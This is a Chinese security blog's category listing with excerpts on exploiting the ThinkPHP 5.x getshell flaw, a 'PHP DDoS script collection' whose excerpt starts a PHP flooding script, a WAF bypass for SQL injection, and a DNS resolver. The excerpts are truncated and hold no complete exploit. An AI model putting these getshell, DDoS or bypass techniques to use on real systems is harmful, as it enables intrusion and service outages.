分类 网络安全技术 下的文章

ThinkPHP远程命令执行漏洞利用(GetShell)系列

最近ThinkPHP致命漏洞(GetShell)好像传遍了各大社区,今日我也来研究一下漏洞的形成原因,并且复现一次漏洞分析:由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本(v5.0.23及v5.1.31以下版本),推荐尽快更新到最新版本。文件:thinkphp/library/think/App.php// 获取控制器名...

thinkphp代码执行getshell系列

先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell影响的范围: 5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)这里附上一个自己测试的 thinkphp的 链接 http://www.thinkphp.cn/download/1260.html 版本是5.0.22...

PHP DDoS脚本集合发布{持续更新}

一.PHP DDOS网页端反射攻击的API源码,接口请求地址如下图。源码如下:<?phpignore_user_abort(true);set_time_limit(1000);$server_ip = "1.3.3.7"; //ip  $server_pass = "aeys"...

FreenomWorld提供快速和匿名的公共DNS解析器

Freenom World是一种快速和匿名的公共DNS解析器中文官网:http://www.freenom.world/地址:80.80.80.8080.80.81.81优势:获得快速互联网体验您放心,您的附近定会有一个DNS解析器。 Freenom的DNS解析器遍布全世界,分布在与众多不同层级的互联网网络运营商相连的每个角落。 Freenom的Anycast技术可确保让您的计算机或设备选取...

利用逻辑特性bypass最新版安全狗SQL注入

关于&符号和|:(1)按位与运算符(&)按位与运算将两个运算分量的对应位按位遵照以下规则进行计算:0 & 0 = 0, 0 & 1 = 0, 1 & 0 = 0, 1 & 1 = 1。即同为 1 的位,结果为 1,否则结果为 0。例如,设3的内部表示为000000115的内部表示为00000101则3&5的结果为00000001按位与运...